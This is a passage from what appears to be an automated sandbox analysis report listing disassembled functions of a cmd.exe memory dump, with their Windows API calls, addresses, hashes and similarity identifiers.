                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D86553
                                                                                        • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D86590
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D865AD
                                                                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00D620B8,?,00000000,02000000,?,?,?,00000000,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D865D4
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D865EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteValue$CreateOpen
                                                                                        • String ID: %s=%s
                                                                                        • API String ID: 1019019434-1087296587
                                                                                        • Opcode ID: 01bfc3ada652f34bed0d9e4fd642460ba95987e013dc213c016e08b0985cf573
                                                                                        • Instruction ID: 607c0700d8dd1c965591af5a68dbc74880fed81709069b7b1be4bddedbe66475
                                                                                        • Opcode Fuzzy Hash: 01bfc3ada652f34bed0d9e4fd642460ba95987e013dc213c016e08b0985cf573
                                                                                        • Instruction Fuzzy Hash: 7E41B072D04215ABDB31AB55DC09FAF7B78EBC6F60F044159F805A7250D7268E01CBB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D67150 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsnicmpswscanf
                                                                                        • String ID: :EOF
                                                                                        • API String ID: 1534968528-551370653
                                                                                        • Opcode ID: 6f6e08943a61d7304087072dbf3aa2cd0f736a5c8d333dfc0d651c57df19d9f2
                                                                                        • Instruction ID: 8dd0d01e02d5393d32d1f697cf0feff94eddb7d8ca1eaa20c85332791887aa4d
                                                                                        • Opcode Fuzzy Hash: 6f6e08943a61d7304087072dbf3aa2cd0f736a5c8d333dfc0d651c57df19d9f2
                                                                                        • Instruction Fuzzy Hash: 91314831A08354ABC720AB98DC45B7A77A8EF86718F18501AF985D7391EB38CC41CBB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D86035 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00D86069
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 00D8607E
                                                                                        • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 00D860DC
                                                                                        • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00D86128
                                                                                        • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 00D8614F
                                                                                        • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00D86186
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                        • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                        • API String ID: 1580871199-2613899276
                                                                                        • Opcode ID: 1fcd76838bfeef93703da4196859e295eb9705063fc043cd9d0d0de6e2155008
                                                                                        • Instruction ID: 97224f24cee8ef948cda6d123f25210d3a89a316e9a52d1f126f38f41b1cbdc4
                                                                                        • Opcode Fuzzy Hash: 1fcd76838bfeef93703da4196859e295eb9705063fc043cd9d0d0de6e2155008
                                                                                        • Instruction Fuzzy Hash: 804130B0A00319ABDB20AB25DC89BBAB77CEB45754F0441A9A605E3242DB70DE45CB79
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D7654B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcsicmp.MSVCRT ref: 00D765A4
                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00D765D7
                                                                                        • _open_osfhandle.MSVCRT ref: 00D765EB
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00D82092
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                        • String ID: con
                                                                                        • API String ID: 689241570-4257191772
                                                                                        • Opcode ID: 7d4bbd4ddcff1fd611ec50e3965befaa2f936335d088f82eee1efce2069473e4
                                                                                        • Instruction ID: 917f65418a72cad7289b3e832c921a4f2744f851a153fad3cf4f693800fc36b0
                                                                                        • Opcode Fuzzy Hash: 7d4bbd4ddcff1fd611ec50e3965befaa2f936335d088f82eee1efce2069473e4
                                                                                        • Instruction Fuzzy Hash: BE31F132A04715AFD7249BA89C49B7F7AA9E745334F24822AE456E32C4FB70DD00D771
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D861A2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 00D861D7
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00D86211
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00D86254
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D8625B
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00D8628D
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D86294
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 00D8629B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                                                        • String ID: PE
                                                                                        • API String ID: 3093239467-4258593460
                                                                                        • Opcode ID: eff83ff58ea7062c240b8ce831efbf82e526c49a7e3ba92b0fc6c933667eff3d
                                                                                        • Instruction ID: be9f650e9e26ba9d103357dfb389d086611af0dc224a8b9aedb7a80832af6da6
                                                                                        • Opcode Fuzzy Hash: eff83ff58ea7062c240b8ce831efbf82e526c49a7e3ba92b0fc6c933667eff3d
                                                                                        • Instruction Fuzzy Hash: 6231CE34700304AAEB207BA58C09FBE7769EFCAB25F084294F911D62C4DB74D806C779
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D68F21 Relevance: 13.9, APIs: 9, Instructions: 389COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcsicmp.MSVCRT ref: 00D68FCD
                                                                                        • _wcsicmp.MSVCRT ref: 00D68FE3
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D69002
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D69013
                                                                                          • Part of subcall function 00D6A62F: wcschr.MSVCRT ref: 00D6A635
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                                                                        • String ID:
                                                                                        • API String ID: 2943530692-0
                                                                                        • Opcode ID: 1c95d9caeab30f8166c96f62744b0273a346607c72f197dbcd1236154909a3a1
                                                                                        • Instruction ID: 73dc36d9e828755f6aa5bf3e1177cde02de0a384c8909d9beadf6cf3927ead3c
                                                                                        • Opcode Fuzzy Hash: 1c95d9caeab30f8166c96f62744b0273a346607c72f197dbcd1236154909a3a1
                                                                                        • Instruction Fuzzy Hash: 9DC1F731A003119BCB24AF78889577AB7B9EF48724F28812AE54AD7290FB74DD41DB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6802C Relevance: 13.7, APIs: 9, Instructions: 175COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D68060
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D681BE
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D6818C
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D68197
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,-00000001,00000000,?,00000000), ref: 00D7B09E
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D7B0AB
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D7B0C1
                                                                                        • fprintf.MSVCRT ref: 00D7B0D5
                                                                                        • fflush.MSVCRT ref: 00D7B0E3
                                                                                          • Part of subcall function 00D68F21: _wcsicmp.MSVCRT ref: 00D68FCD
                                                                                          • Part of subcall function 00D68F21: _wcsicmp.MSVCRT ref: 00D68FE3
                                                                                          • Part of subcall function 00D68F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D69002
                                                                                          • Part of subcall function 00D68F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D69013
                                                                                          • Part of subcall function 00D68E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DA8BF0,00000000,?), ref: 00D68EC3
                                                                                          • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D3A
                                                                                          • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D44
                                                                                          • Part of subcall function 00D71CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D57
                                                                                          • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D61
                                                                                          • Part of subcall function 00D701F5: wcsrchr.MSVCRT ref: 00D701FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 3753564779-0
                                                                                        • Opcode ID: 7b0bc69857912757e2bf592ee9ec49a768ae6f950d2933c3737454ac1efeb4ce
                                                                                        • Instruction ID: 3241fa2239772fc169c99bfa786a811e6daa2bbe511d91c21f8e98cff92e5d10
                                                                                        • Opcode Fuzzy Hash: 7b0bc69857912757e2bf592ee9ec49a768ae6f950d2933c3737454ac1efeb4ce
                                                                                        • Instruction Fuzzy Hash: BF51CF30A003159BCB24ABB89C56B7BB7B4EF09710F18451AF94AD7291EB74C981DB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D88B6C Relevance: 13.6, APIs: 9, Instructions: 93fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D88B7B
                                                                                        • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D89323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D88B83
                                                                                          • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
                                                                                        • _get_osfhandle.MSVCRT ref: 00D88BB5
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D88BBD
                                                                                        • _get_osfhandle.MSVCRT ref: 00D88BCF
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D88BD7
                                                                                        • memcmp.MSVCRT ref: 00D88BED
                                                                                          • Part of subcall function 00D7654B: _wcsicmp.MSVCRT ref: 00D765A4
                                                                                          • Part of subcall function 00D7654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00D765D7
                                                                                          • Part of subcall function 00D7654B: _open_osfhandle.MSVCRT ref: 00D765EB
                                                                                          • Part of subcall function 00D7654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00D82092
                                                                                        • _get_osfhandle.MSVCRT ref: 00D88C1A
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D88C22
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
                                                                                        • String ID:
                                                                                        • API String ID: 4208585293-0
                                                                                        • Opcode ID: 1a44604d28541e9af9cd37593bcd15b8f9504a07e9e2b2c023803938fea239cf
                                                                                        • Instruction ID: 37fd79f72407fe4a11d236b098f628f520c13ab88bdd165d1bee1c3346bd254c
                                                                                        • Opcode Fuzzy Hash: 1a44604d28541e9af9cd37593bcd15b8f9504a07e9e2b2c023803938fea239cf
                                                                                        • Instruction Fuzzy Hash: 3F219171200204AFEB186F78DC4AE7AB75DEF89360F244A28F556D22E5EBB19C05D731
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D738D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: %s
                                                                                        • API String ID: 2221118986-3043279178
                                                                                        • Opcode ID: 848f2ff474eb43a5bf07b1b37267313e523f015a92c08885236fb0b89456058d
                                                                                        • Instruction ID: 4b16282f90b57211774936cc212eadad1480a7b40173538b8e11efacec9d7a0b
                                                                                        • Opcode Fuzzy Hash: 848f2ff474eb43a5bf07b1b37267313e523f015a92c08885236fb0b89456058d
                                                                                        • Instruction Fuzzy Hash: 29915CB16083419BD734DB64D896BABB3E4BF94304F08892DE58D96191FB34EA04DB73
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6BF70 Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • _wcsnicmp.MSVCRT ref: 00D6C1B7
                                                                                        • wcstol.MSVCRT ref: 00D6C1FC
                                                                                        • wcstol.MSVCRT ref: 00D6C28A
                                                                                        • longjmp.MSVCRT(?,000000FF), ref: 00D7CFB0
                                                                                        • longjmp.MSVCRT(?,000000FF), ref: 00D7CFC4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                                                                        • String ID:
                                                                                        • API String ID: 2863075230-0
                                                                                        • Opcode ID: acfd9d3c157191edbca5585268373081a234b2c0e4026f7f75399b73f7f675f3
                                                                                        • Instruction ID: 70cd487d40de24f9428e82f8a903cbb9682bdb4ce3c48620a4b683b610a53744
                                                                                        • Opcode Fuzzy Hash: acfd9d3c157191edbca5585268373081a234b2c0e4026f7f75399b73f7f675f3
                                                                                        • Instruction Fuzzy Hash: EAF19075D10215CBCB24DF98C8906BEB7B1FF88700F69921AD896A7340E775AD42CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D726DC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 193COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D72795
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • memset.MSVCRT ref: 00D7280E
                                                                                        • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 00D7281D
                                                                                        • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 00D72857
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D7290B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$EnvironmentVariable
                                                                                        • String ID: DIRCMD
                                                                                        • API String ID: 1405722092-1465291664
                                                                                        • Opcode ID: 5390f59da92859797084f1fca854f760fd15058161ef05d61f0120c0fa8f4459
                                                                                        • Instruction ID: dfa86d48f2d6b2ae6cdf27a0213fa8aa33926320b4b980ec0d83a6b1051d6a91
                                                                                        • Opcode Fuzzy Hash: 5390f59da92859797084f1fca854f760fd15058161ef05d61f0120c0fa8f4459
                                                                                        • Instruction Fuzzy Hash: 947119B190C3819BD764DF29C8846ABBBE4FF95314F14892EF599C3250EB309904CB67
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D731EA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswdigit
                                                                                        • String ID: +-~!$<>+-*/%()|^&=,
                                                                                        • API String ID: 2770779731-632268628
                                                                                        • Opcode ID: cc3e35e28434319b1363ca80b5a150ac166499ebaa711e825c936c87a994417e
                                                                                        • Instruction ID: c742cac09206aaa364530e56a3b6a87593798c6ed2120cbcd753eb46f06fc383
                                                                                        • Opcode Fuzzy Hash: cc3e35e28434319b1363ca80b5a150ac166499ebaa711e825c936c87a994417e
                                                                                        • Instruction Fuzzy Hash: 1B1191362046129F97649F6EE84487677E8EF9B771324802EF5C5C7251FB21DC00E679
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D649F8 Relevance: 12.2, APIs: 8, Instructions: 187COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D69A11: _get_osfhandle.MSVCRT ref: 00D69A1C
                                                                                          • Part of subcall function 00D69A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D6793A,00000104,?), ref: 00D69A2B
                                                                                          • Part of subcall function 00D69A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A47
                                                                                          • Part of subcall function 00D69A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A56
                                                                                          • Part of subcall function 00D69A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A61
                                                                                          • Part of subcall function 00D69A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A6A
                                                                                        • _get_osfhandle.MSVCRT ref: 00D786E3
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D786EB
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00D7872A
                                                                                        • _get_osfhandle.MSVCRT ref: 00D78743
